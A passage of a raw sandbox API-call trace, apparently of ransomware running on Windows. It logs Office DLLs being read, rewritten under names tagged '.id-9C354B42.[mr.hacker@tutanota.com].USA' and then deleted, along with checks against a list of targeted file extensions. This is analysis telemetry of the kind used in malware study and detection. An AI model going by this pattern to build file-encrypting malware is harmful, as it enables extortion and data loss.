(lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.092] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0058.092] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.092] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.092] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0058.092] GetLastError () returned 0x0 [0058.092] ReadFile (in: hFile=0x22c, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0xcdb0, lpOverlapped=0x0) returned 1 [0058.095] WriteFile (in: hFile=0x1c8, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xcdc0, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xcdc0, lpOverlapped=0x0) returned 1 [0058.096] ReadFile (in: hFile=0x22c, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.096] WriteFile (in: hFile=0x1c8, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.097] SetEndOfFile (hFile=0x1c8) returned 1 [0058.097] CloseHandle (hObject=0x1c8) returned 1 [0058.097] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.097] SetEndOfFile (hFile=0x22c) returned 1 [0058.098] CloseHandle (hObject=0x22c) returned 1 [0058.098] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.098] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll")) returned 1 [0058.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0058.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0058.098] lstrlenW (lpString=".doc") returned 4 [0058.098] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.099] lstrlenW (lpString=".docx") returned 5 [0058.099] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0058.099] lstrlenW (lpString=".pdf") returned 4 [0058.099] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.099] lstrlenW (lpString=".xls") returned 4 [0058.099] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.099] lstrlenW (lpString=".xlsx") returned 5 [0058.099] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0058.099] lstrlenW (lpString=".ppt") returned 4 [0058.099] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0058.099] lstrlenW (lpString=".zip") returned 4 [0058.099] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.099] lstrlenW (lpString=".rar") returned 4 [0058.099] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.099] lstrlenW (lpString=".bz2") returned 4 [0058.099] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.099] lstrlenW (lpString=".7z") returned 3 [0058.099] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0058.099] lstrlenW (lpString=".dbf") returned 4 [0058.099] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0058.099] lstrlenW (lpString=".1cd") returned 4 [0058.099] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0058.099] lstrlenW (lpString=".jpg") returned 4 [0058.099] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0058.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0058.099] lstrlenW (lpString=".doc") returned 4 [0058.099] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.100] lstrlenW (lpString=".docx") returned 5 [0058.100] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0058.100] lstrlenW (lpString=".pdf") returned 4 [0058.100] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.100] lstrlenW (lpString=".xls") returned 4 [0058.100] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.100] lstrlenW (lpString=".xlsx") returned 5 [0058.100] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0058.100] lstrlenW (lpString=".ppt") returned 4 [0058.100] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0058.100] lstrlenW (lpString=".zip") returned 4 [0058.100] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.100] lstrlenW (lpString=".rar") returned 4 [0058.100] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.100] lstrlenW (lpString=".bz2") returned 4 [0058.100] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.100] lstrlenW (lpString=".7z") returned 3 [0058.100] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0058.100] lstrlenW (lpString=".dbf") returned 4 [0058.100] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0058.100] lstrlenW (lpString=".1cd") returned 4 [0058.100] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73 [0058.100] lstrlenW (lpString=".jpg") returned 4 [0058.100] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.100] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0058.101] lstrlenW (lpString="MSSOAPR3.DLL") returned 12 [0058.101] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0058.102] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=41864) returned 1 [0058.102] CloseHandle (hObject=0x22c) returned 1 [0058.102] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll")) returned 0x20 [0058.102] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.102] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0058.102] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.102] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.102] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0058.968] GetLastError () returned 0x0 [0058.968] ReadFile (in: hFile=0x22c, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0xa388, lpOverlapped=0x0) returned 1 [0058.970] WriteFile (in: hFile=0x23c, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xa390, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xa390, lpOverlapped=0x0) returned 1 [0058.972] ReadFile (in: hFile=0x22c, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.972] WriteFile (in: hFile=0x23c, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.972] SetEndOfFile (hFile=0x23c) returned 1 [0058.972] CloseHandle (hObject=0x23c) returned 1 [0058.973] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.973] SetEndOfFile (hFile=0x22c) returned 1 [0058.974] CloseHandle (hObject=0x22c) returned 1 [0058.974] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.974] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll")) returned 1 [0058.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0058.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0058.974] lstrlenW (lpString=".doc") returned 4 [0058.974] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.974] lstrlenW (lpString=".docx") returned 5 [0058.974] lstrcmpiW (lpString1=".docx", lpString2="3.DLL") returned -1 [0058.974] lstrlenW (lpString=".pdf") returned 4 [0058.974] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.974] lstrlenW (lpString=".xls") returned 4 [0058.974] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.974] lstrlenW (lpString=".xlsx") returned 5 [0058.974] lstrcmpiW (lpString1=".xlsx", lpString2="3.DLL") returned -1 [0058.974] lstrlenW (lpString=".ppt") returned 4 [0058.974] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0058.975] lstrlenW (lpString=".zip") returned 4 [0058.975] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.975] lstrlenW (lpString=".rar") returned 4 [0058.975] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.975] lstrlenW (lpString=".bz2") returned 4 [0058.975] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.975] lstrlenW (lpString=".7z") returned 3 [0058.975] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0058.975] lstrlenW (lpString=".dbf") returned 4 [0058.975] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0058.975] lstrlenW (lpString=".1cd") returned 4 [0058.975] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0058.975] lstrlenW (lpString=".jpg") returned 4 [0058.975] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0058.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0058.975] lstrlenW (lpString=".doc") returned 4 [0058.975] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.975] lstrlenW (lpString=".docx") returned 5 [0058.975] lstrcmpiW (lpString1=".docx", lpString2="3.DLL") returned -1 [0058.975] lstrlenW (lpString=".pdf") returned 4 [0058.975] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.975] lstrlenW (lpString=".xls") returned 4 [0058.975] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.975] lstrlenW (lpString=".xlsx") returned 5 [0058.975] lstrcmpiW (lpString1=".xlsx", lpString2="3.DLL") returned -1 [0058.975] lstrlenW (lpString=".ppt") returned 4 [0058.975] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0058.975] lstrlenW (lpString=".zip") returned 4 [0058.975] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.975] lstrlenW (lpString=".rar") returned 4 [0058.975] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.976] lstrlenW (lpString=".bz2") returned 4 [0058.976] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.976] lstrlenW (lpString=".7z") returned 3 [0058.976] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0058.976] lstrlenW (lpString=".dbf") returned 4 [0058.976] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0058.976] lstrlenW (lpString=".1cd") returned 4 [0058.976] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0058.976] lstrlenW (lpString=".jpg") returned 4 [0058.976] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.976] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0058.976] lstrlenW (lpString="ACEERR.DLL") returned 10 [0058.976] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0058.977] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=43408) returned 1 [0058.977] CloseHandle (hObject=0x22c) returned 1 [0058.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll")) returned 0x20 [0058.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.977] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0058.977] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.977] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.977] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0058.978] GetLastError () returned 0x0 [0058.978] ReadFile (in: hFile=0x22c, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0xa990, lpOverlapped=0x0) returned 1 [0058.981] WriteFile (in: hFile=0x23c, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xa9a0, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xa9a0, lpOverlapped=0x0) returned 1 [0058.983] ReadFile (in: hFile=0x22c, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.983] WriteFile (in: hFile=0x23c, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0058.983] SetEndOfFile (hFile=0x23c) returned 1 [0058.983] CloseHandle (hObject=0x23c) returned 1 [0058.983] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.983] SetEndOfFile (hFile=0x22c) returned 1 [0058.984] CloseHandle (hObject=0x22c) returned 1 [0058.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.984] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll")) returned 1 [0058.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0058.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0058.985] lstrlenW (lpString=".doc") returned 4 [0058.985] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.985] lstrlenW (lpString=".docx") returned 5 [0058.985] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0058.985] lstrlenW (lpString=".pdf") returned 4 [0058.985] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.985] lstrlenW (lpString=".xls") returned 4 [0058.985] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.985] lstrlenW (lpString=".xlsx") returned 5 [0058.985] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0058.985] lstrlenW (lpString=".ppt") returned 4 [0058.985] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0058.985] lstrlenW (lpString=".zip") returned 4 [0058.985] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.985] lstrlenW (lpString=".rar") returned 4 [0058.985] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.985] lstrlenW (lpString=".bz2") returned 4 [0058.985] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.985] lstrlenW (lpString=".7z") returned 3 [0058.985] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0058.985] lstrlenW (lpString=".dbf") returned 4 [0058.985] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0058.985] lstrlenW (lpString=".1cd") returned 4 [0058.985] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0058.985] lstrlenW (lpString=".jpg") returned 4 [0058.985] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0058.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0058.985] lstrlenW (lpString=".doc") returned 4 [0058.986] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.986] lstrlenW (lpString=".docx") returned 5 [0058.986] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0058.986] lstrlenW (lpString=".pdf") returned 4 [0058.986] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.986] lstrlenW (lpString=".xls") returned 4 [0058.986] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.986] lstrlenW (lpString=".xlsx") returned 5 [0058.986] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0058.986] lstrlenW (lpString=".ppt") returned 4 [0058.986] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0058.986] lstrlenW (lpString=".zip") returned 4 [0058.986] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.986] lstrlenW (lpString=".rar") returned 4 [0058.986] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.986] lstrlenW (lpString=".bz2") returned 4 [0058.986] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.986] lstrlenW (lpString=".7z") returned 3 [0058.986] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0058.986] lstrlenW (lpString=".dbf") returned 4 [0058.986] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0058.986] lstrlenW (lpString=".1cd") returned 4 [0058.986] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 66 [0058.986] lstrlenW (lpString=".jpg") returned 4 [0058.986] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.986] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0058.986] lstrlenW (lpString="ACEES.DLL") returned 9 [0058.987] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0058.987] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=1012648) returned 1 [0058.987] CloseHandle (hObject=0x22c) returned 1 [0058.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll")) returned 0x20 [0058.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.988] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 